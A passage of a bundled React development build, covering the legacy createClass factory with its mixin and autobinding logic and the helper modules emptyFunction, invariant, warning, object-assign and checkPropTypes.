 *\n     * @type {array}\n     * @optional\n     */\n    mixins: 'DEFINE_MANY',\n\n    /**\n     * An object containing properties and methods that should be defined on\n     * the component's constructor instead of its prototype (static methods).\n     *\n     * @type {object}\n     * @optional\n     */\n    statics: 'DEFINE_MANY',\n\n    /**\n     * Definition of prop types for this component.\n     *\n     * @type {object}\n     * @optional\n     */\n    propTypes: 'DEFINE_MANY',\n\n    /**\n     * Definition of context types for this component.\n     *\n     * @type {object}\n     * @optional\n     */\n    contextTypes: 'DEFINE_MANY',\n\n    /**\n     * Definition of context types this component sets for its children.\n     *\n     * @type {object}\n     * @optional\n     */\n    childContextTypes: 'DEFINE_MANY',\n\n    // ==== Definition methods ====\n\n    /**\n     * Invoked when the component is mounted. Values in the mapping will be set on\n     * `this.props` if that prop is not specified (i.e. using an `in` check).\n     *\n     * This method is invoked before `getInitialState` and therefore cannot rely\n     * on `this.state` or use `this.setState`.\n     *\n     * @return {object}\n     * @optional\n     */\n    getDefaultProps: 'DEFINE_MANY_MERGED',\n\n    /**\n     * Invoked once before the component is mounted. The return value will be used\n     * as the initial value of `this.state`.\n     *\n     *   getInitialState: function() {\n     *     return {\n     *       isOn: false,\n     *       fooBaz: new BazFoo()\n     *     }\n     *   }\n     *\n     * @return {object}\n     * @optional\n     */\n    getInitialState: 'DEFINE_MANY_MERGED',\n\n    /**\n     * @return {object}\n     * @optional\n     */\n    getChildContext: 'DEFINE_MANY_MERGED',\n\n    /**\n     * Uses props from `this.props` and state from `this.state` to render the\n     * structure of the component.\n     *\n     * No guarantees are made about when or how often this method is invoked, so\n     * it must not have side effects.\n     *\n     *   render: function() {\n     *     var name = this.props.name;\n     *     return <div>Hello, {name}!</div>;\n     *   }\n     *\n     * @return {ReactComponent}\n     * @required\n     */\n    render: 'DEFINE_ONCE',\n\n    // ==== Delegate methods ====\n\n    /**\n     * Invoked when the component is initially created and about to be mounted.\n     * This may have side effects, but any external subscriptions or data created\n     * by this method must be cleaned up in `componentWillUnmount`.\n     *\n     * @optional\n     */\n    componentWillMount: 'DEFINE_MANY',\n\n    /**\n     * Invoked when the component has been mounted and has a DOM representation.\n     * However, there is no guarantee that the DOM node is in the document.\n     *\n     * Use this as an opportunity to operate on the DOM when the component has\n     * been mounted (initialized and rendered) for the first time.\n     *\n     * @param {DOMElement} rootNode DOM element representing the component.\n     * @optional\n     */\n    componentDidMount: 'DEFINE_MANY',\n\n    /**\n     * Invoked before the component receives new props.\n     *\n     * Use this as an opportunity to react to a prop transition by updating the\n     * state using `this.setState`. Current props are accessed via `this.props`.\n     *\n     *   componentWillReceiveProps: function(nextProps, nextContext) {\n     *     this.setState({\n     *       likesIncreasing: nextProps.likeCount > this.props.likeCount\n     *     });\n     *   }\n     *\n     * NOTE: There is no equivalent `componentWillReceiveState`. An incoming prop\n     * transition may cause a state change, but the opposite is not true. If you\n     * need it, you are probably looking for `componentWillUpdate`.\n     *\n     * @param {object} nextProps\n     * @optional\n     */\n    componentWillReceiveProps: 'DEFINE_MANY',\n\n    /**\n     * Invoked while deciding if the component should be updated as a result of\n     * receiving new props, state and/or context.\n     *\n     * Use this as an opportunity to `return false` when you're certain that the\n     * transition to the new props/state/context will not require a component\n     * update.\n     *\n     *   shouldComponentUpdate: function(nextProps, nextState, nextContext) {\n     *     return !equal(nextProps, this.props) ||\n     *       !equal(nextState, this.state) ||\n     *       !equal(nextContext, this.context);\n     *   }\n     *\n     * @param {object} nextProps\n     * @param {?object} nextState\n     * @param {?object} nextContext\n     * @return {boolean} True if the component should update.\n     * @optional\n     */\n    shouldComponentUpdate: 'DEFINE_ONCE',\n\n    /**\n     * Invoked when the component is about to update due to a transition from\n     * `this.props`, `this.state` and `this.context` to `nextProps`, `nextState`\n     * and `nextContext`.\n     *\n     * Use this as an opportunity to perform preparation before an update occurs.\n     *\n     * NOTE: You **cannot** use `this.setState()` in this method.\n     *\n     * @param {object} nextProps\n     * @param {?object} nextState\n     * @param {?object} nextContext\n     * @param {ReactReconcileTransaction} transaction\n     * @optional\n     */\n    componentWillUpdate: 'DEFINE_MANY',\n\n    /**\n     * Invoked when the component's DOM representation has been updated.\n     *\n     * Use this as an opportunity to operate on the DOM when the component has\n     * been updated.\n     *\n     * @param {object} prevProps\n     * @param {?object} prevState\n     * @param {?object} prevContext\n     * @param {DOMElement} rootNode DOM element representing the component.\n     * @optional\n     */\n    componentDidUpdate: 'DEFINE_MANY',\n\n    /**\n     * Invoked when the component is about to be removed from its parent and have\n     * its DOM representation destroyed.\n     *\n     * Use this as an opportunity to deallocate any external resources.\n     *\n     * NOTE: There is no `componentDidUnmount` since your component will have been\n     * destroyed by that point.\n     *\n     * @optional\n     */\n    componentWillUnmount: 'DEFINE_MANY',\n\n    // ==== Advanced methods ====\n\n    /**\n     * Updates the component's currently mounted DOM representation.\n     *\n     * By default, this implements React's rendering and reconciliation algorithm.\n     * Sophisticated clients may wish to override this.\n     *\n     * @param {ReactReconcileTransaction} transaction\n     * @internal\n     * @overridable\n     */\n    updateComponent: 'OVERRIDE_BASE'\n  };\n\n  /**\n   * Mapping from class specification keys to special processing functions.\n   *\n   * Although these are declared like instance properties in the specification\n   * when defining classes using `React.createClass`, they are actually static\n   * and are accessible on the constructor instead of the prototype. Despite\n   * being static, they must be defined outside of the \"statics\" key under\n   * which all other static methods are defined.\n   */\n  var RESERVED_SPEC_KEYS = {\n    displayName: function(Constructor, displayName) {\n      Constructor.displayName = displayName;\n    },\n    mixins: function(Constructor, mixins) {\n      if (mixins) {\n        for (var i = 0; i < mixins.length; i++) {\n          mixSpecIntoComponent(Constructor, mixins[i]);\n        }\n      }\n    },\n    childContextTypes: function(Constructor, childContextTypes) {\n      if (\"development\" !== 'production') {\n        validateTypeDef(Constructor, childContextTypes, 'childContext');\n      }\n      Constructor.childContextTypes = _assign(\n        {},\n        Constructor.childContextTypes,\n        childContextTypes\n      );\n    },\n    contextTypes: function(Constructor, contextTypes) {\n      if (\"development\" !== 'production') {\n        validateTypeDef(Constructor, contextTypes, 'context');\n      }\n      Constructor.contextTypes = _assign(\n        {},\n        Constructor.contextTypes,\n        contextTypes\n      );\n    },\n    /**\n     * Special case getDefaultProps which should move into statics but requires\n     * automatic merging.\n     */\n    getDefaultProps: function(Constructor, getDefaultProps) {\n      if (Constructor.getDefaultProps) {\n        Constructor.getDefaultProps = createMergedResultFunction(\n          Constructor.getDefaultProps,\n          getDefaultProps\n        );\n      } else {\n        Constructor.getDefaultProps = getDefaultProps;\n      }\n    },\n    propTypes: function(Constructor, propTypes) {\n      if (\"development\" !== 'production') {\n        validateTypeDef(Constructor, propTypes, 'prop');\n      }\n      Constructor.propTypes = _assign({}, Constructor.propTypes, propTypes);\n    },\n    statics: function(Constructor, statics) {\n      mixStaticSpecIntoComponent(Constructor, statics);\n    },\n    autobind: function() {}\n  };\n\n  function validateTypeDef(Constructor, typeDef, location) {\n    for (var propName in typeDef) {\n      if (typeDef.hasOwnProperty(propName)) {\n        // use a warning instead of an _invariant so components\n        // don't show up in prod but only in __DEV__\n        if (\"development\" !== 'production') {\n          warning(\n            typeof typeDef[propName] === 'function',\n            '%s: %s type `%s` is invalid; it must be a function, usually from ' +\n              'React.PropTypes.',\n            Constructor.displayName || 'ReactClass',\n            ReactPropTypeLocationNames[location],\n            propName\n          );\n        }\n      }\n    }\n  }\n\n  function validateMethodOverride(isAlreadyDefined, name) {\n    var specPolicy = ReactClassInterface.hasOwnProperty(name)\n      ? ReactClassInterface[name]\n      : null;\n\n    // Disallow overriding of base class methods unless explicitly allowed.\n    if (ReactClassMixin.hasOwnProperty(name)) {\n      _invariant(\n        specPolicy === 'OVERRIDE_BASE',\n        'ReactClassInterface: You are attempting to override ' +\n          '`%s` from your class specification. Ensure that your method names ' +\n          'do not overlap with React methods.',\n        name\n      );\n    }\n\n    // Disallow defining methods more than once unless explicitly allowed.\n    if (isAlreadyDefined) {\n      _invariant(\n        specPolicy === 'DEFINE_MANY' || specPolicy === 'DEFINE_MANY_MERGED',\n        'ReactClassInterface: You are attempting to define ' +\n          '`%s` on your component more than once. This conflict may be due ' +\n          'to a mixin.',\n        name\n      );\n    }\n  }\n\n  /**\n   * Mixin helper which handles policy validation and reserved\n   * specification keys when building React classes.\n   */\n  function mixSpecIntoComponent(Constructor, spec) {\n    if (!spec) {\n      if (\"development\" !== 'production') {\n        var typeofSpec = typeof spec;\n        var isMixinValid = typeofSpec === 'object' && spec !== null;\n\n        if (\"development\" !== 'production') {\n          warning(\n            isMixinValid,\n            \"%s: You're attempting to include a mixin that is either null \" +\n              'or not an object. Check the mixins included by the component, ' +\n              'as well as any mixins they include themselves. ' +\n              'Expected object but got %s.',\n            Constructor.displayName || 'ReactClass',\n            spec === null ? null : typeofSpec\n          );\n        }\n      }\n\n      return;\n    }\n\n    _invariant(\n      typeof spec !== 'function',\n      \"ReactClass: You're attempting to \" +\n        'use a component class or function as a mixin. Instead, just use a ' +\n        'regular object.'\n    );\n    _invariant(\n      !isValidElement(spec),\n      \"ReactClass: You're attempting to \" +\n        'use a component as a mixin. Instead, just use a regular object.'\n    );\n\n    var proto = Constructor.prototype;\n    var autoBindPairs = proto.__reactAutoBindPairs;\n\n    // By handling mixins before any other properties, we ensure the same\n    // chaining order is applied to methods with DEFINE_MANY policy, whether\n    // mixins are listed before or after these methods in the spec.\n    if (spec.hasOwnProperty(MIXINS_KEY)) {\n      RESERVED_SPEC_KEYS.mixins(Constructor, spec.mixins);\n    }\n\n    for (var name in spec) {\n      if (!spec.hasOwnProperty(name)) {\n        continue;\n      }\n\n      if (name === MIXINS_KEY) {\n        // We have already handled mixins in a special case above.\n        continue;\n      }\n\n      var property = spec[name];\n      var isAlreadyDefined = proto.hasOwnProperty(name);\n      validateMethodOverride(isAlreadyDefined, name);\n\n      if (RESERVED_SPEC_KEYS.hasOwnProperty(name)) {\n        RESERVED_SPEC_KEYS[name](Constructor, property);\n      } else {\n        // Setup methods on prototype:\n        // The following member methods should not be automatically bound:\n        // 1. Expected ReactClass methods (in the \"interface\").\n        // 2. Overridden methods (that were mixed in).\n        var isReactClassMethod = ReactClassInterface.hasOwnProperty(name);\n        var isFunction = typeof property === 'function';\n        var shouldAutoBind =\n          isFunction &&\n          !isReactClassMethod &&\n          !isAlreadyDefined &&\n          spec.autobind !== false;\n\n        if (shouldAutoBind) {\n          autoBindPairs.push(name, property);\n          proto[name] = property;\n        } else {\n          if (isAlreadyDefined) {\n            var specPolicy = ReactClassInterface[name];\n\n            // These cases should already be caught by validateMethodOverride.\n            _invariant(\n              isReactClassMethod &&\n                (specPolicy === 'DEFINE_MANY_MERGED' ||\n                  specPolicy === 'DEFINE_MANY'),\n              'ReactClass: Unexpected spec policy %s for key %s ' +\n                'when mixing in component specs.',\n              specPolicy,\n              name\n            );\n\n            // For methods which are defined more than once, call the existing\n            // methods before calling the new property, merging if appropriate.\n            if (specPolicy === 'DEFINE_MANY_MERGED') {\n              proto[name] = createMergedResultFunction(proto[name], property);\n            } else if (specPolicy === 'DEFINE_MANY') {\n              proto[name] = createChainedFunction(proto[name], property);\n            }\n          } else {\n            proto[name] = property;\n            if (\"development\" !== 'production') {\n              // Add verbose displayName to the function, which helps when looking\n              // at profiling tools.\n              if (typeof property === 'function' && spec.displayName) {\n                proto[name].displayName = spec.displayName + '_' + name;\n              }\n            }\n          }\n        }\n      }\n    }\n  }\n\n  function mixStaticSpecIntoComponent(Constructor, statics) {\n    if (!statics) {\n      return;\n    }\n    for (var name in statics) {\n      var property = statics[name];\n      if (!statics.hasOwnProperty(name)) {\n        continue;\n      }\n\n      var isReserved = name in RESERVED_SPEC_KEYS;\n      _invariant(\n        !isReserved,\n        'ReactClass: You are attempting to define a reserved ' +\n          'property, `%s`, that shouldn\\'t be on the \"statics\" key. Define it ' +\n          'as an instance property instead; it will still be accessible on the ' +\n          'constructor.',\n        name\n      );\n\n      var isInherited = name in Constructor;\n      _invariant(\n        !isInherited,\n        'ReactClass: You are attempting to define ' +\n          '`%s` on your component more than once. This conflict may be ' +\n          'due to a mixin.',\n        name\n      );\n      Constructor[name] = property;\n    }\n  }\n\n  /**\n   * Merge two objects, but throw if both contain the same key.\n   *\n   * @param {object} one The first object, which is mutated.\n   * @param {object} two The second object\n   * @return {object} one after it has been mutated to contain everything in two.\n   */\n  function mergeIntoWithNoDuplicateKeys(one, two) {\n    _invariant(\n      one && two && typeof one === 'object' && typeof two === 'object',\n      'mergeIntoWithNoDuplicateKeys(): Cannot merge non-objects.'\n    );\n\n    for (var key in two) {\n      if (two.hasOwnProperty(key)) {\n        _invariant(\n          one[key] === undefined,\n          'mergeIntoWithNoDuplicateKeys(): ' +\n            'Tried to merge two objects with the same key: `%s`. This conflict ' +\n            'may be due to a mixin; in particular, this may be caused by two ' +\n            'getInitialState() or getDefaultProps() methods returning objects ' +\n            'with clashing keys.',\n          key\n        );\n        one[key] = two[key];\n      }\n    }\n    return one;\n  }\n\n  /**\n   * Creates a function that invokes two functions and merges their return values.\n   *\n   * @param {function} one Function to invoke first.\n   * @param {function} two Function to invoke second.\n   * @return {function} Function that invokes the two argument functions.\n   * @private\n   */\n  function createMergedResultFunction(one, two) {\n    return function mergedResult() {\n      var a = one.apply(this, arguments);\n      var b = two.apply(this, arguments);\n      if (a == null) {\n        return b;\n      } else if (b == null) {\n        return a;\n      }\n      var c = {};\n      mergeIntoWithNoDuplicateKeys(c, a);\n      mergeIntoWithNoDuplicateKeys(c, b);\n      return c;\n    };\n  }\n\n  /**\n   * Creates a function that invokes two functions and ignores their return vales.\n   *\n   * @param {function} one Function to invoke first.\n   * @param {function} two Function to invoke second.\n   * @return {function} Function that invokes the two argument functions.\n   * @private\n   */\n  function createChainedFunction(one, two) {\n    return function chainedFunction() {\n      one.apply(this, arguments);\n      two.apply(this, arguments);\n    };\n  }\n\n  /**\n   * Binds a method to the component.\n   *\n   * @param {object} component Component whose method is going to be bound.\n   * @param {function} method Method to be bound.\n   * @return {function} The bound method.\n   */\n  function bindAutoBindMethod(component, method) {\n    var boundMethod = method.bind(component);\n    if (\"development\" !== 'production') {\n      boundMethod.__reactBoundContext = component;\n      boundMethod.__reactBoundMethod = method;\n      boundMethod.__reactBoundArguments = null;\n      var componentName = component.constructor.displayName;\n      var _bind = boundMethod.bind;\n      boundMethod.bind = function(newThis) {\n        for (\n          var _len = arguments.length,\n            args = Array(_len > 1 ? _len - 1 : 0),\n            _key = 1;\n          _key < _len;\n          _key++\n        ) {\n          args[_key - 1] = arguments[_key];\n        }\n\n        // User is trying to bind() an autobound method; we effectively will\n        // ignore the value of \"this\" that the user is trying to use, so\n        // let's warn.\n        if (newThis !== component && newThis !== null) {\n          if (\"development\" !== 'production') {\n            warning(\n              false,\n              'bind(): React component methods may only be bound to the ' +\n                'component instance. See %s',\n              componentName\n            );\n          }\n        } else if (!args.length) {\n          if (\"development\" !== 'production') {\n            warning(\n              false,\n              'bind(): You are binding a component method to the component. ' +\n                'React does this for you automatically in a high-performance ' +\n                'way, so you can safely remove this call. See %s',\n              componentName\n            );\n          }\n          return boundMethod;\n        }\n        var reboundMethod = _bind.apply(boundMethod, arguments);\n        reboundMethod.__reactBoundContext = component;\n        reboundMethod.__reactBoundMethod = method;\n        reboundMethod.__reactBoundArguments = args;\n        return reboundMethod;\n      };\n    }\n    return boundMethod;\n  }\n\n  /**\n   * Binds all auto-bound methods in a component.\n   *\n   * @param {object} component Component whose method is going to be bound.\n   */\n  function bindAutoBindMethods(component) {\n    var pairs = component.__reactAutoBindPairs;\n    for (var i = 0; i < pairs.length; i += 2) {\n      var autoBindKey = pairs[i];\n      var method = pairs[i + 1];\n      component[autoBindKey] = bindAutoBindMethod(component, method);\n    }\n  }\n\n  var IsMountedPreMixin = {\n    componentDidMount: function() {\n      this.__isMounted = true;\n    }\n  };\n\n  var IsMountedPostMixin = {\n    componentWillUnmount: function() {\n      this.__isMounted = false;\n    }\n  };\n\n  /**\n   * Add more to the ReactClass base class. These are all legacy features and\n   * therefore not already part of the modern ReactComponent.\n   */\n  var ReactClassMixin = {\n    /**\n     * TODO: This will be deprecated because state should always keep a consistent\n     * type signature and the only use case for this, is to avoid that.\n     */\n    replaceState: function(newState, callback) {\n      this.updater.enqueueReplaceState(this, newState, callback);\n    },\n\n    /**\n     * Checks whether or not this composite component is mounted.\n     * @return {boolean} True if mounted, false otherwise.\n     * @protected\n     * @final\n     */\n    isMounted: function() {\n      if (\"development\" !== 'production') {\n        warning(\n          this.__didWarnIsMounted,\n          '%s: isMounted is deprecated. Instead, make sure to clean up ' +\n            'subscriptions and pending requests in componentWillUnmount to ' +\n            'prevent memory leaks.',\n          (this.constructor && this.constructor.displayName) ||\n            this.name ||\n            'Component'\n        );\n        this.__didWarnIsMounted = true;\n      }\n      return !!this.__isMounted;\n    }\n  };\n\n  var ReactClassComponent = function() {};\n  _assign(\n    ReactClassComponent.prototype,\n    ReactComponent.prototype,\n    ReactClassMixin\n  );\n\n  /**\n   * Creates a composite component class given a class specification.\n   * See https://facebook.github.io/react/docs/top-level-api.html#react.createclass\n   *\n   * @param {object} spec Class specification (which must define `render`).\n   * @return {function} Component constructor function.\n   * @public\n   */\n  function createClass(spec) {\n    // To keep our warnings more understandable, we'll use a little hack here to\n    // ensure that Constructor.name !== 'Constructor'. This makes sure we don't\n    // unnecessarily identify a class without displayName as 'Constructor'.\n    var Constructor = identity(function(props, context, updater) {\n      // This constructor gets overridden by mocks. The argument is used\n      // by mocks to assert on what gets mounted.\n\n      if (\"development\" !== 'production') {\n        warning(\n          this instanceof Constructor,\n          'Something is calling a React component directly. Use a factory or ' +\n            'JSX instead. See: https://fb.me/react-legacyfactory'\n        );\n      }\n\n      // Wire up auto-binding\n      if (this.__reactAutoBindPairs.length) {\n        bindAutoBindMethods(this);\n      }\n\n      this.props = props;\n      this.context = context;\n      this.refs = emptyObject;\n      this.updater = updater || ReactNoopUpdateQueue;\n\n      this.state = null;\n\n      // ReactClasses doesn't have constructors. Instead, they use the\n      // getInitialState and componentWillMount methods for initialization.\n\n      var initialState = this.getInitialState ? this.getInitialState() : null;\n      if (\"development\" !== 'production') {\n        // We allow auto-mocks to proceed as if they're returning null.\n        if (\n          initialState === undefined &&\n          this.getInitialState._isMockFunction\n        ) {\n          // This is probably bad practice. Consider warning here and\n          // deprecating this convenience.\n          initialState = null;\n        }\n      }\n      _invariant(\n        typeof initialState === 'object' && !Array.isArray(initialState),\n        '%s.getInitialState(): must return an object or null',\n        Constructor.displayName || 'ReactCompositeComponent'\n      );\n\n      this.state = initialState;\n    });\n    Constructor.prototype = new ReactClassComponent();\n    Constructor.prototype.constructor = Constructor;\n    Constructor.prototype.__reactAutoBindPairs = [];\n\n    injectedMixins.forEach(mixSpecIntoComponent.bind(null, Constructor));\n\n    mixSpecIntoComponent(Constructor, IsMountedPreMixin);\n    mixSpecIntoComponent(Constructor, spec);\n    mixSpecIntoComponent(Constructor, IsMountedPostMixin);\n\n    // Initialize the defaultProps property after all mixins have been merged.\n    if (Constructor.getDefaultProps) {\n      Constructor.defaultProps = Constructor.getDefaultProps();\n    }\n\n    if (\"development\" !== 'production') {\n      // This is a tag to indicate that the use of these method names is ok,\n      // since it's used with createClass. If it's not, then it's likely a\n      // mistake so we'll warn you to use the static property, property\n      // initializer or constructor respectively.\n      if (Constructor.getDefaultProps) {\n        Constructor.getDefaultProps.isReactClassApproved = {};\n      }\n      if (Constructor.prototype.getInitialState) {\n        Constructor.prototype.getInitialState.isReactClassApproved = {};\n      }\n    }\n\n    _invariant(\n      Constructor.prototype.render,\n      'createClass(...): Class specification must implement a `render` method.'\n    );\n\n    if (\"development\" !== 'production') {\n      warning(\n        !Constructor.prototype.componentShouldUpdate,\n        '%s has a method called ' +\n          'componentShouldUpdate(). Did you mean shouldComponentUpdate()? ' +\n          'The name is phrased as a question because the function is ' +\n          'expected to return a value.',\n        spec.displayName || 'A component'\n      );\n      warning(\n        !Constructor.prototype.componentWillRecieveProps,\n        '%s has a method called ' +\n          'componentWillRecieveProps(). Did you mean componentWillReceiveProps()?',\n        spec.displayName || 'A component'\n      );\n    }\n\n    // Reduce time spent doing lookups by setting these on the prototype.\n    for (var methodName in ReactClassInterface) {\n      if (!Constructor.prototype[methodName]) {\n        Constructor.prototype[methodName] = null;\n      }\n    }\n\n    return Constructor;\n  }\n\n  return createClass;\n}\n\nmodule.exports = factory;\n\n},{\"29\":29,\"30\":30,\"31\":31,\"32\":32}],28:[function(_dereq_,module,exports){\n\"use strict\";\n\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\nfunction makeEmptyFunction(arg) {\n  return function () {\n    return arg;\n  };\n}\n\n/**\n * This function accepts and discards inputs; it has no side effects. This is\n * primarily useful idiomatically for overridable function endpoints which\n * always need to be callable, since JS lacks a null-call idiom ala Cocoa.\n */\nvar emptyFunction = function emptyFunction() {};\n\nemptyFunction.thatReturns = makeEmptyFunction;\nemptyFunction.thatReturnsFalse = makeEmptyFunction(false);\nemptyFunction.thatReturnsTrue = makeEmptyFunction(true);\nemptyFunction.thatReturnsNull = makeEmptyFunction(null);\nemptyFunction.thatReturnsThis = function () {\n  return this;\n};\nemptyFunction.thatReturnsArgument = function (arg) {\n  return arg;\n};\n\nmodule.exports = emptyFunction;\n},{}],29:[function(_dereq_,module,exports){\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar emptyObject = {};\n\nif (\"development\" !== 'production') {\n  Object.freeze(emptyObject);\n}\n\nmodule.exports = emptyObject;\n},{}],30:[function(_dereq_,module,exports){\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * Use invariant() to assert state which your program assumes to be true.\n *\n * Provide sprintf-style format (only %s is supported) and arguments\n * to provide information about what broke and what you were\n * expecting.\n *\n * The invariant message will be stripped in production, but the invariant\n * will remain to ensure logic does not differ in production.\n */\n\nvar validateFormat = function validateFormat(format) {};\n\nif (\"development\" !== 'production') {\n  validateFormat = function validateFormat(format) {\n    if (format === undefined) {\n      throw new Error('invariant requires an error message argument');\n    }\n  };\n}\n\nfunction invariant(condition, format, a, b, c, d, e, f) {\n  validateFormat(format);\n\n  if (!condition) {\n    var error;\n    if (format === undefined) {\n      error = new Error('Minified exception occurred; use the non-minified dev environment ' + 'for the full error message and additional helpful warnings.');\n    } else {\n      var args = [a, b, c, d, e, f];\n      var argIndex = 0;\n      error = new Error(format.replace(/%s/g, function () {\n        return args[argIndex++];\n      }));\n      error.name = 'Invariant Violation';\n    }\n\n    error.framesToPop = 1; // we don't care about invariant's own frame\n    throw error;\n  }\n}\n\nmodule.exports = invariant;\n},{}],31:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-2015, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar emptyFunction = _dereq_(28);\n\n/**\n * Similar to invariant but only logs a warning if the condition is not met.\n * This can be used to log issues in development environments in critical\n * paths. Removing the logging code for production environments will keep the\n * same logic and follow the same code paths.\n */\n\nvar warning = emptyFunction;\n\nif (\"development\" !== 'production') {\n  (function () {\n    var printWarning = function printWarning(format) {\n      for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {\n        args[_key - 1] = arguments[_key];\n      }\n\n      var argIndex = 0;\n      var message = 'Warning: ' + format.replace(/%s/g, function () {\n        return args[argIndex++];\n      });\n      if (typeof console !== 'undefined') {\n        console.error(message);\n      }\n      try {\n        // --- Welcome to debugging React ---\n        // This error was thrown as a convenience so that you can use this stack\n        // to find the callsite that caused this warning to fire.\n        throw new Error(message);\n      } catch (x) {}\n    };\n\n    warning = function warning(condition, format) {\n      if (format === undefined) {\n        throw new Error('`warning(condition, format, ...args)` requires a warning ' + 'message argument');\n      }\n\n      if (format.indexOf('Failed Composite propType: ') === 0) {\n        return; // Ignore CompositeComponent proptype check.\n      }\n\n      if (!condition) {\n        for (var _len2 = arguments.length, args = Array(_len2 > 2 ? _len2 - 2 : 0), _key2 = 2; _key2 < _len2; _key2++) {\n          args[_key2 - 2] = arguments[_key2];\n        }\n\n        printWarning.apply(undefined, [format].concat(args));\n      }\n    };\n  })();\n}\n\nmodule.exports = warning;\n},{\"28\":28}],32:[function(_dereq_,module,exports){\n/*\nobject-assign\n(c) Sindre Sorhus\n@license MIT\n*/\n\n'use strict';\n/* eslint-disable no-unused-vars */\nvar getOwnPropertySymbols = Object.getOwnPropertySymbols;\nvar hasOwnProperty = Object.prototype.hasOwnProperty;\nvar propIsEnumerable = Object.prototype.propertyIsEnumerable;\n\nfunction toObject(val) {\n\tif (val === null || val === undefined) {\n\t\tthrow new TypeError('Object.assign cannot be called with null or undefined');\n\t}\n\n\treturn Object(val);\n}\n\nfunction shouldUseNative() {\n\ttry {\n\t\tif (!Object.assign) {\n\t\t\treturn false;\n\t\t}\n\n\t\t// Detect buggy property enumeration order in older V8 versions.\n\n\t\t// https://bugs.chromium.org/p/v8/issues/detail?id=4118\n\t\tvar test1 = new String('abc');  // eslint-disable-line no-new-wrappers\n\t\ttest1[5] = 'de';\n\t\tif (Object.getOwnPropertyNames(test1)[0] === '5') {\n\t\t\treturn false;\n\t\t}\n\n\t\t// https://bugs.chromium.org/p/v8/issues/detail?id=3056\n\t\tvar test2 = {};\n\t\tfor (var i = 0; i < 10; i++) {\n\t\t\ttest2['_' + String.fromCharCode(i)] = i;\n\t\t}\n\t\tvar order2 = Object.getOwnPropertyNames(test2).map(function (n) {\n\t\t\treturn test2[n];\n\t\t});\n\t\tif (order2.join('') !== '0123456789') {\n\t\t\treturn false;\n\t\t}\n\n\t\t// https://bugs.chromium.org/p/v8/issues/detail?id=3056\n\t\tvar test3 = {};\n\t\t'abcdefghijklmnopqrst'.split('').forEach(function (letter) {\n\t\t\ttest3[letter] = letter;\n\t\t});\n\t\tif (Object.keys(Object.assign({}, test3)).join('') !==\n\t\t\t\t'abcdefghijklmnopqrst') {\n\t\t\treturn false;\n\t\t}\n\n\t\treturn true;\n\t} catch (err) {\n\t\t// We don't expect any of the above to throw, but better to be safe.\n\t\treturn false;\n\t}\n}\n\nmodule.exports = shouldUseNative() ? Object.assign : function (target, source) {\n\tvar from;\n\tvar to = toObject(target);\n\tvar symbols;\n\n\tfor (var s = 1; s < arguments.length; s++) {\n\t\tfrom = Object(arguments[s]);\n\n\t\tfor (var key in from) {\n\t\t\tif (hasOwnProperty.call(from, key)) {\n\t\t\t\tto[key] = from[key];\n\t\t\t}\n\t\t}\n\n\t\tif (getOwnPropertySymbols) {\n\t\t\tsymbols = getOwnPropertySymbols(from);\n\t\t\tfor (var i = 0; i < symbols.length; i++) {\n\t\t\t\tif (propIsEnumerable.call(from, symbols[i])) {\n\t\t\t\t\tto[symbols[i]] = from[symbols[i]];\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn to;\n};\n\n},{}],33:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n */\n\n'use strict';\n\nif (\"development\" !== 'production') {\n  var invariant = _dereq_(30);\n  var warning = _dereq_(31);\n  var ReactPropTypesSecret = _dereq_(36);\n  var loggedTypeFailures = {};\n}\n\n/**\n * Assert that the values match with the type specs.\n * Error messages are memorized and will only be shown once.\n *\n * @param {object} typeSpecs Map of name to a ReactPropType\n * @param {object} values Runtime values that need to be type-checked\n * @param {string} location e.g. \"prop\", \"context\", \"child context\"\n * @param {string} componentName Name of the component for error messages.\n * @param {?Function} getStack Returns the component stack.\n * @private\n */\nfunction checkPropTypes(typeSpecs, values, location, componentName, getStack) {\n  if (\"development\" !== 'production') {\n    for (var typeSpecName in typeSpecs) {\n      if (typeSpecs.hasOwnProperty(typeSpecName)) {\n        var error;\n        // Prop type validation may throw. In case they do, we don't want to\n        // fail the render phase where it didn't fail before. So we log it.\n        // After these have been cleaned up, we'll let them throw.\n        try {\n          // This is intentionally an invariant that gets caught. It's the same\n          // behavior as without this statement except with a better message.\n          invariant(typeof typeSpecs[typeSpecName] === 'function', '%s: %s type `%s` is invalid; it must be a function, usually from ' + 'React.PropTypes.', componentName || 'React class', location, typeSpecName);\n          error = typeSpecs[typeSpecName](values, typeSpecName, componentName, location, null, ReactPropTypesSecret);\n        } catch (ex) {\n          error = ex;\n        }\n        warning(!error || error instanceof Error, '%s: type specification of %s `%s` is invalid; the type checker ' + 'function must return `null` or an `Error` but returned a %s. ' + 'You may have forgotten to pass an argument to the type checker ' + 'creator (arrayOf, instanceOf, objectOf, oneOf, oneOfType, and ' + 'shape all require an argument).', componentName || 'React class', location, typeSpecName, typeof error);\n        if (error instanceof Error && !(error.message in loggedTypeFailures)) {\n          // Only monitor this failure once because there tends to be a lot of the\n          // same error.\n          loggedTypeFailures[error.message] = true;\n\n          var stack = getStack ? getStack() : '';\n\n          warning(false, 'Failed %s type: %s%s', location, error.message, stack != null ? stack : '');\n        }\n      }\n    }\n  